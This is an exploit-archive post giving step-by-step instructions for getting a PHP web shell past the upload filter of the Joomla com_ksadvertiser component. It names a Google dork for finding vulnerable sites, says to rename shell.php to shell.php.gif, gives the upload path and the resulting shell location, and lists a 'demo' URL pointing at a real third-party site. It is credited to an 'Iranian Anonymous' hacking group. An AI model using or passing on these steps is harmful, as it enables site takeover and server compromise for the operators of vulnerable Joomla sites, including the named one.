Joomla com_ksadvertiser Advertiser Remote File & Bypass Upload shell
Posted on 30 November -0001
<HTML><HEAD><TITLE>Joomla com_ksadvertiser Advertiser Remote File & Bypass Upload shell</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY> ########################## # Exploit Title: Joomla Advertiser Remote File & Bypass Upload shell # Dork Google: inurl:index.php?option=com_ksadvertiser # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # vendor Link: http://www.kiss-software.de # Tested on : Linux-Windows7 ########################## 1. Some pages require the Register Registrese Algunas Paginas lo exigen http://site/index.php?option=com_user&view=login ###################################### 2. Go to the upload path Dirijase a la ruta del upload http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en ###################################### 3. Go to images and give click to upload, browse your file shell.php, and rename it to shell.php.gif Vaya a imagenes y dele click a upload, examine su archivo shell.php y renombrelo a shell.php.gif ####################################### 4. Locate your file in the root / images/ksadvertiser/U0 -> this may vary Busque su archivo en la raiz /images/ksadvertiser/U0 --> esta puede variar http://site/images/ksadvertiser/U0/403.php.gif ####################################### Demo : http://www.oekobaustoffe.com//index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en ############################## #Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="a0dcdcf3c8e0c490d7">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || And All Of Iranian Anonymous . # Discovered By: Hacker Khan </BODY></HTML>
